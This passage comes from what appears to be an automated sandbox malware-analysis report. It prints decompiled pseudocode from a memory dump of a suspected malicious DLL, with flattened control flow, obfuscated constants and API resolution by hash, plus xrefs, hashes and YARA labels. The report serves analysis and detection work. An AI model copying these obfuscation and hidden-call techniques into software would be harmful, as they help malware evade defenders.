					_t187 =  &(_t187[2]);
					_t151 = 0xf4b2976;
					continue;
					L23:
					__eflags = _t151 - 0x9a4295f;
					if(_t151 == 0x9a4295f) {
						__eflags = _v140 - 5;
						if(__eflags == 0) {
							E00882D53( &_v152, _t184);
							_t151 = 0x574a4dd;
							goto L45;
						}
						_t151 = 0xa7bb9ce;
						continue;
					}
					__eflags = _t151 - 0xa7bb9ce;
					if(_t151 == 0xa7bb9ce) {
						__eflags = _v140 - 6;
						if(__eflags == 0) {
							E0087A474( &_v152);
							goto L16;
						}
						_t151 = 0x2270dbc;
						continue;
					}
					__eflags = _t151 - 0xaf84b7f;
					if(_t151 == 0xaf84b7f) {
						__eflags = _v140 - 4;
						if(__eflags == 0) {
							E0086238C( &_v152);
							goto L16;
						}
						_t151 = 0x9a4295f;
						continue;
					}
					__eflags = _t151 - 0xbf40480;
					if(_t151 == 0xbf40480) {
						__eflags = _v140 - 2;
						if(__eflags == 0) {
							E0087CCD9( &_v152, _t184);
							goto L16;
						}
						_t151 = 0x90fe06e;
						continue;
					}
					__eflags = _t151 - 0xc6d3ff5;
					if(_t151 == 0xc6d3ff5) {
						__eflags = _v140 - 1;
						if(__eflags == 0) {
							E0086A871( &_v152);
							goto L16;
						}
						_t151 = 0xbf40480;
						continue;
					}
					__eflags = _t151 - 0xf4b2976;
					if(_t151 != 0xf4b2976) {
						goto L45;
					}
					E0086B820(0);
					goto L12;
				}
			}

0x0087e4ef
0x0087e4f6
0x0087e4fd
0x0087e504
0x0087e506
0x0087e50b
0x0087e513
0x0087e516
0x0087e520
0x0087e525
0x0087e527
0x0087e52c
0x0087e531
0x0087e53e
0x0087e552
0x0087e553
0x0087e557
0x0087e564
0x0087e568
0x0087e570
0x0087e578
0x0087e57d
0x0087e585
0x0087e592
0x0087e596
0x0087e59e
0x0087e5a3
0x0087e5ab
0x0087e5b3
0x0087e5c0
0x0087e5c4
0x0087e5cc
0x0087e5d4
0x0087e5dc
0x0087e5e4
0x0087e5ec
0x0087e5f4
0x0087e5fc
0x0087e601
0x0087e609
0x0087e617
0x0087e61b
0x0087e623
0x0087e623
0x0087e627
0x0087e62f
0x0087e634
0x0087e639
0x0087e641
0x0087e64e
0x0087e652
0x0087e65a
0x0087e65a
0x0087e660
0x00000000
0x00000000
0x0087e666
0x0087e666
0x0087e79d
0x0087e7a2
0x0087e7b2
0x0087e747
0x0087e747
0x0087e749
0x0087e65a
0x0087e65a
0x0087e65a
0x0087e660
0x00000000
0x00000000
0x00000000
0x0087e660
0x0087e89d
0x0087e89d
0x0087e89d
0x0087e8a9
0x0087e8b5
0x0087e8b5
0x0087e7a4
0x0087e65a
0x0087e65a
0x0087e660
0x00000000
0x00000000
0x00000000
0x0087e660
0x00000000
0x0087e65a
0x0087e672
0x0087e769
0x0087e76a
0x0087e772
0x0087e774
0x0087e777
0x0087e779
0x0087e736
0x0087e736
0x00000000
0x0087e736
0x0087e782
0x0087e789
0x0087e790
0x0087e793
0x00000000
0x0087e793
0x0087e67e
0x0087e740
0x0087e745
0x0087e752
0x0087e752
0x00000000
0x0087e745
0x0087e686
0x0087e72e
0x0087e730
0x00000000
0x00000000
0x00000000
0x0087e730
0x0087e68e
0x0087e6f6
0x0087e6fc
0x0087e6fc
0x0087e703
0x0087e706
0x0087e70c
0x0087e70c
0x00000000
0x0087e70c
0x0087e696
0x0087e6dc
0x0087e6e7
0x0087e6ef
0x00000000
0x0087e6ef
0x0087e69e
0x00000000
0x00000000
0x0087e6bb
0x0087e6c0
0x0087e6c3
0x00000000
0x0087e7b9
0x0087e7b9
0x0087e7bf
0x0087e87f
0x0087e884
0x0087e896
0x0087e89b
0x00000000
0x0087e89b
0x0087e886
0x00000000
0x0087e886
0x0087e7c5
0x0087e7cb
0x0087e860
0x0087e865
0x0087e875
0x00000000
0x0087e875
0x0087e867
0x00000000
0x0087e867
0x0087e7d1
0x0087e7d7
0x0087e841
0x0087e846
0x0087e856
0x00000000
0x0087e856
0x0087e848
0x00000000
0x0087e848
0x0087e7d9
0x0087e7df
0x0087e820
0x0087e825
0x0087e837
0x00000000
0x0087e837
0x0087e827
0x00000000
0x0087e827
0x0087e7e1
0x0087e7e7
0x0087e801
0x0087e806
0x0087e816
0x00000000
0x0087e816
0x0087e808
0x00000000
0x0087e808
0x0087e7e9
0x0087e7ef
0x00000000
0x00000000
0x0087e7f7
0x00000000
0x0087e7f7

Strings

-, xrefs: 0087E5D4
ma+, xrefs: 0087E57D
ap@', xrefs: 0087E5A3
$P, xrefs: 0087E623

Memory Dump Source

Source File: 00000000.00000002.703048375.0000000000861000.00000020.00000001.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.703041906.0000000000860000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.703166511.0000000000886000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: $P$ap@'$-$ma+
API String ID: 0-1845766705
Opcode ID: 7f38b3843fa14b676e6d9b38173303f3e9c6677bf4a4a5c32ee7b35bcf887af7
Instruction ID: a0bbbc925dba3749882ae088efd491cfc036960df75b84cf5c7c4dacff2d507e
Opcode Fuzzy Hash: 7f38b3843fa14b676e6d9b38173303f3e9c6677bf4a4a5c32ee7b35bcf887af7
Instruction Fuzzy Hash: E1917C711083458BC768CF14C89992FBBE5FBE8308F14896EF59A96268C770DA49CF43

Uniqueness

Uniqueness Score: -1.00%

Function 00873EAA, Relevance: 5.2, Strings: 4, Instructions: 152
COMMONCrypto

Download Yara Rule

C-Code - Quality: 98%

			E00873EAA() {
				char _v520;
				signed int _v524;
				signed int _v528;
				signed int _v532;
				signed int _v536;
				signed int _v540;
				signed int _v544;
				signed int _v548;
				signed int _v552;
				signed int _v556;
				signed int _v560;
				signed int _v564;
				signed int _v568;
				signed int _v572;
				signed int _t134;
				void* _t136;
				signed int _t139;
				signed int _t140;
				void* _t141;
				signed int _t158;
				signed int _t159;
				signed int _t160;
				void* _t162;
				signed int _t163;
				signed int* _t164;

				_t164 =  &_v572;
				_v540 = 0x8ebbe1;
				_v540 = _v540 ^ 0xad58d7a7;
				_t141 = 0x14ab4b7;
				_v540 = _v540 + 0xffffedc9;
				_v540 = _v540 ^ 0xadd357de;
				_v568 = 0x9c9bda;
				_v568 = _v568 | 0x36ff3ceb;
				_v568 = _v568 << 9;
				_v568 = _v568 << 0xc;
				_v568 = _v568 ^ 0xff6ebe8a;
				_v572 = 0xc63a18;
				_t158 = 0x35;
				_v572 = _v572 / _t158;
				_v572 = _v572 + 0x3c6e;
				_t162 = 0;
				_t159 = 9;
				_v572 = _v572 * 0x2b;
				_v572 = _v572 ^ 0x00acfd7d;
				_v564 = 0xeb3370;
				_v564 = _v564 + 0xdf6d;
				_v564 = _v564 + 0xffff5689;
				_v564 = _v564 + 0xffff8af1;
				_v564 = _v564 ^ 0x00e2fb3e;
				_v556 = 0xcf22db;
				_v556 = _v556 + 0xdc1c;
				_v556 = _v556 ^ 0xabcda180;
				_v556 = _v556 * 0x79;
				_v556 = _v556 ^ 0xd41378ff;
				_v536 = 0x8b65e6;
				_v536 = _v536 >> 4;
				_v536 = _v536 | 0x892333f7;
				_v536 = _v536 ^ 0x8920b82e;
				_v552 = 0x92756e;
				_v552 = _v552 >> 9;
				_v552 = _v552 ^ 0x00055fbe;
				_v548 = 0xae9165;
				_v548 = _v548 >> 8;
				_v548 = _v548 << 3;
				_v548 = _v548 ^ 0x000d4470;
				_v560 = 0x7e7234;
				_t163 = _v552;
				_t140 = _v552;
				_v560 = _v560 * 0x4b;
				_v560 = _v560 * 0x7e;
				_v560 = _v560 / _t159;
				_v560 = _v560 ^ 0x06ab9265;
				_v524 = 0x1cfeb9;
				_v524 = _v524 + 0xfb24;
				_v524 = _v524 ^ 0x001447a0;
				_v532 = 0x9f8444;
				_t160 = 0x41;
				_t161 = _v552;
				_v532 = _v532 / _t160;
				_v532 = _v532 ^ 0x00060648;
				_v528 = 0xb53968;
				_v528 = _v528 >> 6;
				_v528 = _v528 ^ 0x00025f1c;
				while(_t141 != 0x6ff509) {
					if(_t141 == 0x14ab4b7) {
						_t141 = 0x9db1fde;
						continue;
					} else {
						if(_t141 == 0x18d2c7e) {
							_t140 = E008709DD(_v536,  &_v520, _v552, _v548);
							_t141 = 0x3c9aed4;
							continue;
						} else {
							if(_t141 == 0x3c9aed4) {
								_t134 = E0086EFE1(_v524, _v532, _v528, _t140);
								_t164 =  &(_t164[3]);
								_t163 = _t134;
								_t141 = 0x6ff509;
								continue;
							} else {
								if(_t141 == 0x65dbbcc) {
									_push(_t141);
									_t136 = E00870ABA(_v568, _v572, __eflags, _v564,  &_v520, _t161, _v556);
									_t164 =  &(_t164[5]);
									__eflags = _t136;
									if(__eflags != 0) {
										_t141 = 0x18d2c7e;
										continue;
									}
								} else {
									if(_t141 != 0x9db1fde) {
										L15:
										__eflags = _t141 - 0xdb9fdb2;
										if(__eflags != 0) {
											continue;
										}
									} else {
										_t139 = E0086DD35();
										_t161 = _t139;
										if(_t139 != 0) {
											_t141 = 0x65dbbcc;
											continue;
										}
									}
								}
							}
						}
					}
					return _t162;
				}
				_v544 = 0xee725a;
				_v544 = _v544 ^ 0x4fb40d60;
				_v544 = _v544 | 0x3a9e06c5;
				_v544 = _v544 ^ 0x55f97f1d;
				__eflags = _t163 - _v544;
				_t162 =  ==  ? 1 : _t162;
				__eflags = _t162;
				_t141 = 0xdb9fdb2;
				goto L15;
			}

0x00873eaa
0x00873eb0
0x00873eba
0x00873ec2
0x00873ec7
0x00873ecf
0x00873ed7
0x00873edf
0x00873ee7
0x00873eec
0x00873ef1
0x00873ef9
0x00873f09
0x00873f0e
0x00873f14
0x00873f1c
0x00873f23
0x00873f26
0x00873f2a
0x00873f32
0x00873f3a
0x00873f42
0x00873f4a
0x00873f52
0x00873f5a
0x00873f62
0x00873f6a
0x00873f77
0x00873f7b
0x00873f83
0x00873f8b
0x00873f90
0x00873f98
0x00873fa0
0x00873fa8
0x00873fad
0x00873fb5
0x00873fbd
0x00873fc2
0x00873fc7
0x00873fcf
0x00873fdc
0x00873fe0
0x00873fe4
0x00873fed
0x00873ff9
0x00873ffd
0x00874005
0x0087400d
0x00874015
0x0087401d
0x00874029
0x0087402c
0x00874030
0x00874034
0x0087403c
0x00874044
0x00874049
0x00874051
0x00874063
0x00874124
0x00000000
0x00874069
0x0087406f
0x00874118
0x0087411a
0x00000000
0x00874075
0x0087407b
0x008740ed
0x008740f2
0x008740f5
0x008740f7
0x00000000
0x0087407d
0x00874083
0x008740ab
0x008740c2
0x008740c7
0x008740ca
0x008740cc
0x008740d2
0x00000000
0x008740d2
0x00874085
0x0087408b
0x0087415f
0x0087415f
0x00874165
0x00000000
0x00000000
0x00874091
0x00874095
0x0087409a
0x0087409e
0x008740a4
0x00000000
0x008740a4
0x0087409e
0x0087408b
0x00874083
0x0087407b
0x0087406f
0x00874177
0x00874177
0x0087412e
0x00874138
0x00874141
0x00874149
0x00874155
0x00874157
0x00874157
0x0087415a
0x00000000

Strings

n<, xrefs: 00873F14
Zr, xrefs: 0087412E
4r~, xrefs: 00873FCF
p3, xrefs: 00873F32

Memory Dump Source

Source File: 00000000.00000002.703048375.0000000000861000.00000020.00000001.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.703041906.0000000000860000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.703166511.0000000000886000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: 4r~$Zr$n<$p3
API String ID: 0-1989199487
Opcode ID: 9c14014ca497ea253b6b14b19677e07633968f0fa0b54784dcf0298cd53d7ee1
Instruction ID: f8d4f338dcaea33a19367f53ccc8d74b47f81612cc65e1ef11822e927f91014b
Opcode Fuzzy Hash: 9c14014ca497ea253b6b14b19677e07633968f0fa0b54784dcf0298cd53d7ee1
Instruction Fuzzy Hash: 526145715083409FC358CE26C48982BBBE1FBD8758F109A2DF29AA6264D774CA49CF47

Uniqueness

Uniqueness Score: -1.00%

Function 008785FF, Relevance: 5.1, Strings: 4, Instructions: 142
COMMONCrypto

Download Yara Rule

C-Code - Quality: 65%

			E008785FF(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v76;
				char _v80;
				char _v148;
				void* _t125;
				signed int _t148;
				signed int _t149;
				intOrPtr _t165;
				char _t166;

				_t165 = _a4;
				_push(0);
				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_t165);
				_push(__edx);
				_push(__ecx);
				E0087FE29(_t125);
				_v56 = _v56 & 0x00000000;
				_v64 = 0x4c8eee;
				_v60 = 0xd08445;
				_v12 = 0x2b5b52;
				_v12 = _v12 << 0xa;
				_v12 = _v12 ^ 0x243df932;
				_t148 = 0x1b;
				_v12 = _v12 / _t148;
				_v12 = _v12 ^ 0x0511db29;
				_v32 = 0x4cbd6f;
				_v32 = _v32 >> 0xd;
				_v32 = _v32 << 0x10;
				_v32 = _v32 ^ 0x02619ccd;
				_v8 = 0x229cdc;
				_v8 = _v8 ^ 0x1dfe7fc6;
				_v8 = _v8 + 0x780d;
				_v8 = _v8 >> 1;
				_v8 = _v8 ^ 0x0ee175b3;
				_v40 = 0x8e82d1;
				_v40 = _v40 + 0xffffcc21;
				_t149 = 0x39;
				_v40 = _v40 * 0x69;
				_v40 = _v40 ^ 0x3a51eacf;
				_v20 = 0xb8087c;
				_v20 = _v20 * 0x23;
				_v20 = _v20 >> 5;
				_v20 = _v20 ^ 0x00c96169;
				_v24 = 0x5c9964;
				_v24 = _v24 / _t149;
				_v24 = _v24 >> 7;
				_v24 = _v24 ^ 0x00085b7f;
				_v36 = 0xf34403;
				_v36 = _v36 * 0x6a;
				_v36 = _v36 | 0x7504e0f6;
				_v36 = _v36 ^ 0x75b6ad40;
				_v28 = 0x74a083;
				_v28 = _v28 * 0x7e;
				_v28 = _v28 >> 6;
				_v28 = _v28 ^ 0x00e859e6;
				_v48 = 0x5be020;
				_v48 = _v48 << 3;
				_v48 = _v48 ^ 0x02dd1a4a;
				_v44 = 0xfc2deb;
				_v44 = _v44 + 0x1b3b;
				_v44 = _v44 ^ 0x00f2ef0d;
				_v52 = 0x7de099;
				_v52 = _v52 ^ 0xb346769d;
				_v52 = _v52 ^ 0xb330844a;
				_v16 = 0x4076ee;
				_v16 = _v16 * 0xa;
				_v16 = _v16 * 0x14;
				_v16 = _v16 << 7;
				_v16 = _v16 ^ 0x2e751909;
				_t150 = _v12;
				_push( &_v148);
				_t166 = 0x44;
				_push(_t166);
				E0087FE2A(_v12, _v32);
				_v148 = _t166;
				if(E00882C24(_a8, _v8, _v12, _t150, _v40, _t150, _v20, _a20, _v24,  &_v148, _t150, _v36, _v28, _t150, _a12,  &_v80) == 0) {
					return 0;
				}
				if(_t165 == 0) {
					E00881538(_v48, _v44, _v80);
					E00881538(_v52, _v16, _v76);
				} else {
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
				}
				return 1;
			}

0x0087860a
0x0087860d
0x0087860f
0x00878612
0x00878615
0x00878618
0x0087861b
0x0087861e
0x0087861f
0x00878620
0x00878621
0x00878626
0x0087862c
0x00878633
0x0087863a
0x00878641
0x00878645
0x00878651
0x00878656
0x0087865b
0x00878662
0x00878669
0x0087866d
0x00878671
0x00878678
0x0087867f
0x00878686
0x0087868d
0x00878690
0x00878697
0x0087869e
0x008786a9
0x008786aa
0x008786ad
0x008786b4
0x008786bf
0x008786c2
0x008786c6
0x008786cd
0x008786d9
0x008786dc
0x008786e0
0x008786e7
0x008786f2
0x008786f5
0x008786fc
0x00878703
0x0087870e
0x00878711
0x00878715
0x0087871c
0x00878723
0x00878727
0x0087872e
0x00878735
0x0087873c
0x00878743
0x0087874a
0x00878751
0x00878758
0x00878763
0x0087876a
0x00878773
0x00878777
0x00878781
0x00878784
0x00878787
0x00878788
0x00878789
0x00878791
0x008787cc
0x00000000
0x008787fe
0x008787d0
0x008787e7
0x008787f5
0x008787d2
0x008787d5
0x008787d6
0x008787d7
0x008787d8
0x008787d8
0x00000000

Strings

v@, xrefs: 00878758
R[+, xrefs: 0087863A
[, xrefs: 0087871C
Y, xrefs: 00878715

Memory Dump Source

Source File: 00000000.00000002.703048375.0000000000861000.00000020.00000001.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.703041906.0000000000860000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.703166511.0000000000886000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: [$R[+$Y$v@
API String ID: 0-1276245682
Opcode ID: efe08f301ab2b251a86e33dfee0dd2d26676926c88cc055a74a7a241cd428695
Instruction ID: 5eee1eaf43b5b176007212fa18e77106b3c89cfd9b1d89e1b432fa2fb69714ca
Opcode Fuzzy Hash: efe08f301ab2b251a86e33dfee0dd2d26676926c88cc055a74a7a241cd428695
Instruction Fuzzy Hash: 51614272C00209EFCF08DFE5D94A9EEBBB5FB48304F208059E915BA250D7B59A55CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 00879A01, Relevance: 5.1, Strings: 4, Instructions: 140
COMMONCrypto

Download Yara Rule

C-Code - Quality: 90%

			E00879A01(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				void* _t106;
				intOrPtr _t127;
				void* _t128;
				void* _t130;
				intOrPtr _t143;
				void* _t144;
				void* _t145;
				signed int _t146;
				signed int _t147;
				signed int _t148;
				void* _t150;
				void* _t151;

				_push(_a12);
				_t144 = __edx;
				_t128 = __ecx;
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0087FE29(_t106);
				_v4 = 0x81363a;
				_t151 = _t150 + 0x14;
				_v4 = _v4 | 0xe86970e7;
				_v4 = _v4 ^ 0xe8e8406c;
				_t145 = 0;
				_v8 = 0xe36f3c;
				_t130 = 0x9d12efa;
				_t10 =  &_v8; // 0xe36f3c
				_t146 = 0x18;
				_v8 =  *_t10 / _t146;
				_v8 = _v8 ^ 0x000ac4f9;
				_v28 = 0x86ae71;
				_v28 = _v28 + 0x307d;
				_v28 = _v28 ^ 0x3f5774ce;
				_v28 = _v28 ^ 0x3fdb82be;
				_v12 = 0xd5596e;
				_t147 = 0x24;
				_v12 = _v12 * 0x75;
				_v12 = _v12 ^ 0x618cdae6;
				_v16 = 0xa0cb2;
				_v16 = _v16 + 0x618a;
				_v16 = _v16 + 0xfb99;
				_v16 = _v16 ^ 0x0001ef53;
				_v20 = 0xb65aa2;
				_v20 = _v20 | 0x7ee7663c;
				_v20 = _v20 + 0xffff14a1;
				_v20 = _v20 ^ 0x7ef81620;
				_v24 = 0x69cefc;
				_v24 = _v24 * 5;
				_v24 = _v24 ^ 0x0216a415;
				_v44 = 0xc8ca94;
				_v44 = _v44 * 0x55;
				_v44 = _v44 << 0xc;
				_v44 = _v44 >> 2;
				_v44 = _v44 ^ 0x2d01fb93;
				_v32 = 0xaa7e08;
				_v32 = _v32 << 6;
				_v32 = _v32 / _t147;
				_v32 = _v32 | 0xdbfc63c4;
				_v32 = _v32 ^ 0xdbf76cca;
				_v36 = 0x12ed95;
				_v36 = _v36 + 0xd11f;
				_t148 = 0x64;
				_v36 = _v36 / _t148;
				_v36 = _v36 ^ 0x700cfa35;
				_v36 = _v36 ^ 0x700e1ad8;
				_v40 = 0xf66f66;
				_v40 = _v40 + 0xffff4d0b;
				_v40 = _v40 + 0xffffdddb;
				_v40 = _v40 + 0xffff052c;
				_v40 = _v40 ^ 0x00f507b6;
				do {
					while(_t130 != 0x348ce2d) {
						if(_t130 == 0x5264aba) {
							_t143 =  *0x886228; // 0x0
							E00882B09(_v32, _t143, _v36, _v40);
						} else {
							if(_t130 == 0x5e19b60) {
								if(E00883EE9() != 0) {
									_t130 = 0x348ce2d;
									continue;
								}
							} else {
								if(_t130 == 0x8610059) {
									E0086DCA0();
									_t130 = 0x5264aba;
									continue;
								} else {
									if(_t130 != 0x9d12efa) {
										goto L12;
									} else {
										_push(_t130);
										_push(_t130);
										_t127 = E0086C5D8(0x30);
										_t151 = _t151 + 0xc;
										 *0x886228 = _t127;
										_t130 = 0x5e19b60;
										continue;
									}
								}
							}
						}
						L15:
						return _t145;
					}
					_t145 = E00863271(_v16, _t144, _v20, _t128, _v24, _v44);
					_t151 = _t151 + 0x10;
					if(_t145 == 0) {
						_t130 = 0x8610059;
						goto L12;
					}
					goto L15;
					L12:
				} while (_t130 != 0xbdf1695);
				goto L15;
			}

0x00879a08
0x00879a0c
0x00879a0e
0x00879a10
0x00879a14
0x00879a18
0x00879a19
0x00879a1a
0x00879a1f
0x00879a27
0x00879a2a
0x00879a34
0x00879a3c
0x00879a3e
0x00879a46
0x00879a4b
0x00879a51
0x00879a56
0x00879a5c
0x00879a64
0x00879a6c
0x00879a74
0x00879a7c
0x00879a84
0x00879a91
0x00879a94
0x00879a98
0x00879aa0
0x00879aa8
0x00879ab0
0x00879ab8
0x00879ac0
0x00879ac8
0x00879ad0
0x00879ad8
0x00879ae0
0x00879af5
0x00879af9
0x00879b01
0x00879b0e
0x00879b12
0x00879b17
0x00879b1c
0x00879b24
0x00879b2c
0x00879b39
0x00879b3d
0x00879b45
0x00879b4d
0x00879b55
0x00879b61
0x00879b69
0x00879b6d
0x00879b75
0x00879b7d
0x00879b85
0x00879b8d
0x00879b95
0x00879b9d
0x00879ba5
0x00879ba5
0x00879baf
0x00879c4a
0x00879c54
0x00879bb5
0x00879bbb
0x00879c08
0x00879c0a
0x00000000
0x00879c0a
0x00879bbd
0x00879bc3
0x00879bf5
0x00879bfa
0x00000000
0x00879bc5
0x00879bcb
0x00000000
0x00879bcd
0x00879bdd
0x00879bde
0x00879be1
0x00879be6
0x00879be9
0x00879bee
0x00000000
0x00879bee
0x00879bcb
0x00879bc3
0x00879bbb
0x00879c5c
0x00879c64
0x00879c64
0x00879c26
0x00879c28
0x00879c2d
0x00879c2f
0x00000000
0x00879c2f
0x00000000
0x00879c34
0x00879c34
0x00000000

Strings

<o, xrefs: 00879A4B
}0, xrefs: 00879A6C
<f~, xrefs: 00879AC8
l@, xrefs: 00879A34

Memory Dump Source

Source File: 00000000.00000002.703048375.0000000000861000.00000020.00000001.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.703041906.0000000000860000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.703166511.0000000000886000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: <f~$<o$l@$}0
API String ID: 0-758050912
Opcode ID: e9a376f7a50e3cb89d1a0421e7a6c7fa236ffe5484c34ac3aad3612b0c08d1cb
Instruction ID: f3e158dc10f0d23f1b79d2120837dad4eced458124c2b9bd18e2101153f70ef4
Opcode Fuzzy Hash: e9a376f7a50e3cb89d1a0421e7a6c7fa236ffe5484c34ac3aad3612b0c08d1cb
Instruction Fuzzy Hash: B8515471508340AFC744CF26D88942FBBE1FBD8768F50991DF69A96261D3B1CA488F87

Uniqueness

Uniqueness Score: -1.00%

Function 00862194, Relevance: 5.1, Strings: 4, Instructions: 83
COMMONCrypto

Download Yara Rule

C-Code - Quality: 58%

			E00862194(void* __ecx, void* __edx, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a32, intOrPtr _a36, intOrPtr _a40, intOrPtr _a44, intOrPtr _a48, intOrPtr _a52, intOrPtr _a56, intOrPtr _a60) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				void* _t67;
				intOrPtr* _t77;
				signed int _t80;
				signed int _t81;
				void* _t88;

				_t88 = __ecx;
				E0087FE29(_t67);
				_v28 = 0x23b662;
				_v24 = 0;
				_v12 = 0x5a4623;
				_v12 = _v12 + 0x2367;
				_v12 = _v12 ^ 0x11a2f25e;
				_v12 = _v12 << 5;
				_v12 = _v12 ^ 0x3f16c1ec;
				_v20 = 0x4a1b7a;
				_v20 = _v20 ^ 0x2a8c83f5;
				_v20 = _v20 ^ 0x0b06bd0c;
				_v20 = _v20 ^ 0x21c6558f;
				_v8 = 0x75635a;
				_v8 = _v8 >> 0xc;
				_t80 = 0x19;
				_v8 = _v8 / _t80;
				_v8 = _v8 ^ 0x5f69645e;
				_v8 = _v8 ^ 0x5f68d09e;
				_v16 = 0xc2b090;
				_v16 = _v16 + 0xffff85c8;
				_t81 = 0x7c;
				_v16 = _v16 / _t81;
				_v16 = _v16 ^ 0x000d5e79;
				_t77 = E0086EB52(_t81, _t81, 0x525cea78, 0xe3, 0x4be980c1);
				return  *_t77(_a56, _a36, _a48, 0, 0, _a16, _a60, _t88, _a44, _a52, __ecx, __edx, 0, _a8, _a12, _a16, _a20, _a24, 0, _a32, _a36, _a40, _a44, _a48, _a52, _a56, _a60);
			}

0x008621a1
0x008621cb
0x008621d0
0x008621da
0x008621df
0x008621e6
0x008621ed
0x008621f4
0x008621f8
0x008621ff
0x00862206
0x0086220d
0x00862214
0x0086221b
0x00862222
0x0086222b
0x00862230
0x00862235
0x0086223c
0x00862243
0x0086224a
0x00862254
0x0086225c
0x0086225f
0x0086227e
0x008622a5

Strings

^di_, xrefs: 00862235
g#, xrefs: 008621E6
#FZ, xrefs: 008621DF
y^, xrefs: 0086225F

Memory Dump Source

Source File: 00000000.00000002.703048375.0000000000861000.00000020.00000001.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.703041906.0000000000860000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.703166511.0000000000886000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: #FZ$^di_$g#$y^
API String ID: 0-3614166594
Opcode ID: 898530e46850b57c1b6fa34e43e5d7b9a10138e0edf0e53e97a2ce7a6b0f25a3
Instruction ID: bace49bfcc4348224aa270d31202ed9a27dca218cbba494f052cccfbefa84205
Opcode Fuzzy Hash: 898530e46850b57c1b6fa34e43e5d7b9a10138e0edf0e53e97a2ce7a6b0f25a3
Instruction Fuzzy Hash: B831F272800208FBCF05DFA5DC098DEBFB6FF89314F508159FA14A6120D3B68A60AF90

Uniqueness

Uniqueness Score: -1.00%

Function 00878FAE, Relevance: 4.1, Strings: 3, Instructions: 312
COMMONCrypto

Download Yara Rule

C-Code - Quality: 94%

			E00878FAE(intOrPtr* __ecx) {
				intOrPtr* _v4;
				char _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				void* _t364;
				void* _t367;
				void* _t375;
				void* _t379;
				signed int _t382;
				signed int _t383;
				signed int _t384;
				signed int _t385;
				signed int _t386;
				signed int _t387;
				intOrPtr _t420;
				intOrPtr* _t425;
				void* _t429;
				signed int* _t430;

				_t430 =  &_v164;
				_v44 = 0xc56d85;
				_v44 = _v44 | 0x6747c0a0;
				_v44 = _v44 ^ 0x67c7eda5;
				_v148 = 0xd0221b;
				_v148 = _v148 + 0xb86b;
				_t425 = __ecx;
				_t429 = 0;
				_t382 = 0x2d;
				_v4 = __ecx;
				_t379 = 0x771143;
				_v148 = _v148 / _t382;
				_v148 = _v148 * 0x66;
				_v148 = _v148 ^ 0x01d966be;
				_v152 = 0x268288;
				_v152 = _v152 + 0xc42a;
				_v152 = _v152 * 0x1a;
				_v152 = _v152 | 0x9e13f09a;
				_v152 = _v152 ^ 0x9ffffe9e;
				_v84 = 0x856365;
				_v84 = _v84 + 0xffff26a7;
				_v84 = _v84 << 4;
				_v84 = _v84 ^ 0x0848a0c0;
				_v72 = 0xf332ed;
				_v72 = _v72 ^ 0xef6a6dd6;
				_v72 = _v72 >> 6;
				_v72 = _v72 ^ 0x03be657c;
				_v120 = 0xd51e66;
				_v120 = _v120 | 0x823b6191;
				_v120 = _v120 + 0xffffb8fb;
				_v120 = _v120 + 0xaa7;
				_v120 = _v120 ^ 0x82fd9684;
				_v108 = 0xd10da2;
				_v108 = _v108 + 0xffff1c26;
				_v108 = _v108 + 0xffff12ce;
				_v108 = _v108 ^ 0x00cc3eec;
				_v76 = 0x14aa13;
				_v76 = _v76 ^ 0xa7d92c4a;
				_v76 = _v76 >> 0xc;
